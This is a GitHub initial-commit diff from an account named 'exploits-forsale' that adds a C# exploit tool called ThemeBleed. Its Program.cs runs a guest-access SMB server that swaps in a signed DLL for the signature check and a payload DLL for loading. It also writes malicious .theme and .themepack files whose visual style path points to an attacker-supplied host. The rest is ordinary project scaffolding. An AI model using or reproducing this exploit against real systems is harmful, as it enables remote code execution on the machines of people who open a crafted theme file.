initial commit

exploits-forsale · Sep 13, 2023 · b547c32 · b547c32
commit b547c32
Show file tree

Hide file tree

Showing 7 changed files with 924 additions and 0 deletions.
diff --git a/SMBFilterDemo/App.config b/SMBFilterDemo/App.config
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+    </startup>
+</configuration>
diff --git a/SMBFilterDemo/NTFilteredFileSystem.cs b/SMBFilterDemo/NTFilteredFileSystem.cs
diff --git a/SMBFilterDemo/Program.cs b/SMBFilterDemo/Program.cs
@@ -0,0 +1,151 @@
+using SMBLibrary.Authentication.GSSAPI;
+using SMBLibrary.Authentication.NTLM;
+using SMBLibrary;
+using SMBLibrary.Server;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Net;
+using System.Text;
+using System.Threading.Tasks;
+using System.IO;
+using System.Diagnostics;
+
+namespace SMBFilterDemo
+{
+    internal class Program
+    {
+        static string ShareDirectory;
+
+        public static string GetUserPassword(string accountName)
+        {
+            if (accountName == "Guest")
+            {
+                return String.Empty;
+            }
+            return null;
+        }
+
+        public static void CreateFileFilter(CreateFileInfo createFileInfo)
+        {
+            if (createFileInfo.Path.EndsWith(".msstyles"))
+            {
+                Console.WriteLine("Client requested stage 1 - Version check");
+                createFileInfo.Path = "\\??\\" + Path.Combine(ShareDirectory, "stage_1");
+            }
+            else if (createFileInfo.Path.EndsWith("_vrf.dll"))
+            {
+                if ((uint)createFileInfo.ShareAccess != 5) // if it's going to createfile, feed the signed dll
+                {
+                    Console.WriteLine("Client requested stage 2 - Verify signature");
+                    createFileInfo.Path = "\\??\\" + Path.Combine(ShareDirectory, "stage_2");
+                }
+                else // if it's going to load library feed the payload
+                {
+                    Console.WriteLine("Client requested stage 3 - LoadLibrary");
+                    createFileInfo.Path = "\\??\\" + Path.Combine(ShareDirectory, "stage_3");
+                }
+            }
+        }
+
+        static void RunServer()
+        {
+            ShareDirectory = Path.Combine(Directory.GetCurrentDirectory(), "data");
+            SMBShareCollection shares = new SMBShareCollection();
+            NTFilteredFileSystem FilteredFileSystem = new NTFilteredFileSystem(ShareDirectory);
+            FilteredFileSystem.SetCreateFileFilter(CreateFileFilter);
+
+            FileSystemShare share = new FileSystemShare("test", FilteredFileSystem);
+            shares.Add(share);
+            NTLMAuthenticationProviderBase authenticationMechanism = new IndependentNTLMAuthenticationProvider(GetUserPassword);
+            GSSProvider securityProvider = new GSSProvider(authenticationMechanism);
+            SMBServer server = new SMBServer(shares, securityProvider);
+            server.Start(IPAddress.Parse("0.0.0.0"), SMBTransportType.DirectTCPTransport, false, true);
+            Console.WriteLine("Server started");
+
+            while (true)
+            {
+
+            }
+        }
+
+        static void CreateTheme(string host, string filePath)
+        {
+            string themeData = String.Format(@"; windows 11 theme exploit
+; copyright 2023 fukin software foundation
+
+[Theme]
+DisplayName=@%SystemRoot%\System32\themeui.dll,-2060
+
+[Control Panel\Desktop]
+Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
+TileWallpaper=0
+WallpaperStyle=10
+
+[VisualStyles]
+Path=\\{0}\test\Aero.msstyles
+ColorStyle=NormalColor
+Size=NormalSize
+
+[MasterThemeSelector]
+MTSM=RJSPBS", host);
+            File.WriteAllText(filePath, themeData);
+        }
+
+        static void CreateThemepack(string host, string filePath)
+        {
+            string tempPath = Path.Combine(Directory.GetCurrentDirectory(), "temp.theme");
+            CreateTheme(host, tempPath);
+            Process p = new Process();
+            p.StartInfo.FileName = "makecab.exe";
+            p.StartInfo.WorkingDirectory = Directory.GetCurrentDirectory();
+            p.StartInfo.Arguments = tempPath + " " + filePath;
+            p.Start();
+            p.WaitForExit();
+            File.Delete(tempPath);
+        }
+
+        static void Usage()
+        {
+            Console.WriteLine("Usage: ThemeBleed.exe <command>");
+            Console.WriteLine("");
+            Console.WriteLine("Commands:");
+            Console.WriteLine("\tserver\t\t\t\t\t - Runs the server");
+            Console.WriteLine("\tmake_theme <host> <output path>\t\t - Generates a .theme file referencing the specified host");
+            Console.WriteLine("\tmake_themepack <host> <output_path>\t - Generates a .themepack file referencing the specified host");
+        }
+
+        static void Main(string[] args)
+        {
+            if (args.Length <1) 
+            {
+                Usage();
+                return;
+            }
+            string command = args[0];
+
+            if (command == "server")
+            {
+                RunServer();
+            }
+            if (command == "make_theme")
+            {
+                if (args.Length != 3)
+                {
+                    Console.WriteLine("Invalid number of arguments to make_theme!");
+                    return;
+                }
+                CreateTheme(args[1], args[2]);
+            }
+            if (command == "make_themepack")
+            {
+                if (args.Length != 3)
+                {
+                    Console.WriteLine("Invalid number of arguments to make_themepack!");
+                    return;
+                }
+                CreateThemepack(args[1], args[2]);
+            }
+        }
+    }
+}
diff --git a/SMBFilterDemo/Properties/AssemblyInfo.cs b/SMBFilterDemo/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("SMBFilterDemo")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("SMBFilterDemo")]
+[assembly: AssemblyCopyright("Copyright ©  2023")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("1baceddc-cd87-41dc-948c-1c12f960becb")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/SMBFilterDemo/ThemeBleed.csproj b/SMBFilterDemo/ThemeBleed.csproj
@@ -0,0 +1,61 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{1BACEDDC-CD87-41DC-948C-1C12F960BECB}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>ThemeBleed</RootNamespace>
+    <AssemblyName>ThemeBleed</AssemblyName>
+    <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="SMBLibrary, Version=1.5.0.1, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\SMBLibrary.1.5.0.1\lib\net40\SMBLibrary.dll</HintPath>
+    </Reference>
+    <Reference Include="SMBLibrary.Win32, Version=1.5.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\SMBLibrary.Win32.1.5.0\lib\net40\SMBLibrary.Win32.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="NTFilteredFileSystem.cs" />
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.config" />
+    <None Include="packages.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>
diff --git a/SMBFilterDemo/packages.config b/SMBFilterDemo/packages.config
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="SMBLibrary" version="1.5.0.1" targetFramework="net472" />
+  <package id="SMBLibrary.Win32" version="1.5.0" targetFramework="net472" />
+</packages>
diff --git a/ThemeBleed.sln b/ThemeBleed.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.4.33213.308
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ThemeBleed", "SMBFilterDemo\ThemeBleed.csproj", "{1BACEDDC-CD87-41DC-948C-1C12F960BECB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{1BACEDDC-CD87-41DC-948C-1C12F960BECB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{1BACEDDC-CD87-41DC-948C-1C12F960BECB}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{1BACEDDC-CD87-41DC-948C-1C12F960BECB}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{1BACEDDC-CD87-41DC-948C-1C12F960BECB}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {08E633C2-55C2-465A-959E-AABB46778E28}
+	EndGlobalSection
+EndGlobal